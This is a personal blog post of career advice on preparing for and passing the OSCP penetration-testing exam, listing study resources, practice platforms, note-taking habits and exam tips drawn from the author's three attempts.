Career Advice: Passing the OSCP — Made Simple

7 min readSep 5, 2022

If there’s anything to take out of my blog read “START BEFORE YOU START!”.

Before you start the journey to becoming OSCP certified there are some important points to understand and accept:

The OSCP is not easy
The OSCP require a huge time investment
The OSCP will require some form of monetary investment
The OSCP requires serious willpower, determination, dedication, and a lot of head banging!

Great introductory article by Offensive Security:
https://www.offensive-security.com/offsec/what-it-means-to-be-oscp/

Great preparatory slide deck by Offensive Security:
https://www.offensive-security.com/wp-content/uploads/2022/03/oscp-prep-ebook.pdf

My OSCP Story

To preface what drove me to start my career in cybersecurity was hacking. How? I used to be a hardcore xbox360 Halo3 player. While playing competitively online in ranked matchmaking, there was a method of winning by cheating which was very prevalent. The losing team would start DDoSing the IPs of winning team causing players on the winning team to disconnected form the match. The objective was to give an unfair advantage to the loosing team to make a comeback. Though this method of cheating I was introduced to hacking (mostly kiddy scripting) and began using tools like cain and able and net tools which inevitably sparked my interest in the computer sciences.

I went on to study cybersecurity in college and ended up graduating with a Masters in the same discipline. I started in cybersecurity as a defender/sysadmin for about three years before the OSCP. It wasn’t until late 2020 when I got my first pretesting gig that I really started to learn how to abuse systems as a career. After getting staffed the client had stipulated in the contract that all testes had to be OSCP certified! I had to get it! Thus, my OSCP journey began!

Shortly after being staffed, my employer paid for my PWK course access in February of 2021. At that time, I had been in cyber for a few year with a basic understanding of system administration (cisco/firewall/windows admin), Splunk, and knowledge of managing security tools using the GUI interface.

No real Linux skills

No real Python skills

No real hacker “Methodology”

You’ll hear the term “Methodology” used a lot and very loosely, at time it can be hard to understand. The best way to understand it is as follows:
Technical Knowledge + Hacker Knowledge + Hacker Mindset = Your Methodology. In other words, your logically progression though solving (hacking) boxes.
(Check out my Book Review on The Pentester Blueprint Staring a Create as an Ethical Hacker for more information).

However, I passed my Exam Aug 26, 2022, Alhamdulillah (thanks to God), near two years after starting my journey and after failing the exam twice. Here is how I did it, and here is how you can too!

My OSCP Experience Made Simple

For most, the OSCP is like trying to drink from a fire hose! After blood, sweat and tears here are my most important tips for anyone trying to pass this exam!

My OSCP Resources: (In the order I would recommend)

Udemy Linux: https://www.udemy.com/course/linux-mastery/
Udemy Python: https://www.udemy.com/course/the-python-bible/
eJPT
TJnull List of Proving Ground and HtB boxes
Udemy Windows PrivEs: https://www.udemy.com/course/windows-privilege-escalation/
Udemy Linux PrivEs: https://www.udemy.com/course/windows-privilege-escalation/
Donte Pro Labs (not necessary I completed it, was a great resource)
TryHackMe (Definitely the BoF Room)
PWK Course (Watch the ALL the videos)
PWK Boxes (DO the AD SET!!)
A lot, a lot, a lot of reading. (Articles, blogs, write-ups, reddit posts)

1. START BEFORE YOU START!

Start studying for the OSCP BEFORE you start the PWK course!! This is critical!! Do not go into the PWK course at 0. You will waste your time, money, and your lab environment will explore before you can do anything meaningful. Before you start you should be comfortable using the Linux command line, reading and understand code, and have your “Methodology” somewhat developed (I.e., your Technical Knowledge + Hacker Knowledge + Hacker Mindset). Here are my learning resources that I would recommend devolve your skills!

Linux:

Download VMware or VirtualBox and install kali a VM. (may create a simplified blog for this soon inshaAllah)
Here’s an outstanding course on Linux command line mastery: https://www.udemy.com/course/linux-mastery/. This should help develop the basic skills needed to start.
Start hacking boxes! I will go over the most effective method to hacking boxes later in the blog.

Note: You will need to learn how to use the windows cmd as well. However, you will not need to master it. Most of what you will need to learn will come naturally by way of hacking boxes.

Python:

Here’s an outstanding course on python — https://www.udemy.com/course/the-python-bible/. You do not to become a python developer, you just need to know what an exploit doing before your run it, and how to tweak it if needed.

Note: Don’t run exploits before reading the code… Especially if it’s not from exploitDB… Somebody might sneak in a command that deletes your OS!! or worse..

Devolving your Methodology:

Devolving your methodology will come as you start hacking boxes. Inevitably, by getting hands-on-keyboard you will progressively develop your Methodology. Make sure you take great notes.
Note: Taking notes doesn’t mean highlight the entire book, just what is meaningful. I will explain more later in the blog.

TryHackMe (best for beginners)
Proving Grounds (best OSCP like boxes)
HacktheBox (best community)

No doubt, the most efficient approach to getting hands on practice for the OSCP exam is using TJNull list of OSCP like boxes: https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview

Note: I did 30 boxes from PWK, 40 boxes from Proving Grounds, and 40 boxes from HtB (including Donte Pro labs). I took notes on every box, some I did twice to understand. My numbers may differ from yours, everyone is different.

For privileged escalation I took both of Tib3rius courses on Udemy.
Both are a must! these courses undoubtedly helped me pass the exam!!
Make sure you go in step with him replicating all the different methods.

Linux Privilege Escalation: https://www.udemy.com/course/windows-privilege-escalation/
Windows Privilege Escalation: https://www.udemy.com/course/windows-privilege-escalation/

2. LEARN HOW TO TAKE NOTES

All your notes should be in one location, I recommend using OneNote. Create a folder and make sections to divide your courses and resources.
For example, create a notebook called OSCP then create section like HTB, TryHackMe, PG etc.. Then for each machine start a new pages.
Its crucial that before your exam try to consolidate all your commands into one page for easy reference. Organization is key. The two times I failed my commands were all over the place. I organized everything before my third attempt and passed!

Skim over the OffSecs requirements for the exam report it will give you a great Idea of what note down: https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide
Note: Your exam report is your exam. make sure you take screen shots!

Screenshots, Screenshots, Screenshots!!! GreenShot is a MUST download: https://getgreenshot.org/

How to hack boxes

It took a while to figure out the most efficient approach to practicing. You will find a lot of different opinions on this topic, most of which are not balanced between theory and reality. there is NOTHING wrong with reading though write-ups, in fact it is necessary! I would recommend to read though multiple write ups to see the different approaches to the same vulnerabilities. That’s where the learning is!! However, you should exhaust your resources first before reading though them. (I would not recommend to remain stuck for more then a day).

The general philosophy behind note taking as a hacker is so you can go back at any time and recreate the exploitation step by step. So when hacking boxes screenshot your major steps followed by a short explanation of what you did.
Note: At the end of every box I would write a small lessons learn summary.

You should walk away from every box with two things:
1. An understanding of the technologist abused.
2. An understanding of the exploits used.

How to use IPPsec

IPPsec videos are important to watch as they help you to understand how to think though boxes. However, DO NOT watch is videos and try to hack with him in real time. Meaning, hack the box you’re on first, then go back and watch the IPPsec video on it. This was the approach I took.

3. PWK Course

It is necessary to go through all the PWK content. How I did it was by watching all the videos and taking notes while using the PDF as a reference when needed. If I didn’t understand a topic I would go back to the book and read over that section. After finishing the course material then started the labs.

Passing the Exam

Only after I did everything I advised with was I able to pass the exam on my third try. Its important to trust in your ability and not to be nervous during your exam. On my third try I was much more relaxed then my first two, and ironically, I passed.
Note: OffSec may give you a Buffer overflow box on the exam in addition to the AD environment. I would recommend completing the TryHackMe buffer overflow room.

When taking the exam think simple, trust in your abilities, and time yourself on each box.

I didn’t complete the course work for the extra points. If you choose not to then mathematically you’ll need to pwn the AD environment to pass.
To pass I pwned the AD environment and rooted two stand alone boxes.

Feel free to comment on this post if you have any questions. I will be more than happy to answer.

All the best!

سُبْحَانَكَ اللَّهُمَّ وَبِحَمْدِكَ أَشْهَدُ أَنْ لاَ إِلَهَ إِلَّا أَنْتَ أَسْتَغْفِرُكَ وَأَتُوبُ إِلَيْكَ
Glory is to You, O Allah, and praise is to You. I bear witness that there is none worthy of worship but You. I seek Your forgiveness and repent to You.

Resources:

Other good OSCP write-ups:

GitHub Repo:

Hacking Resources: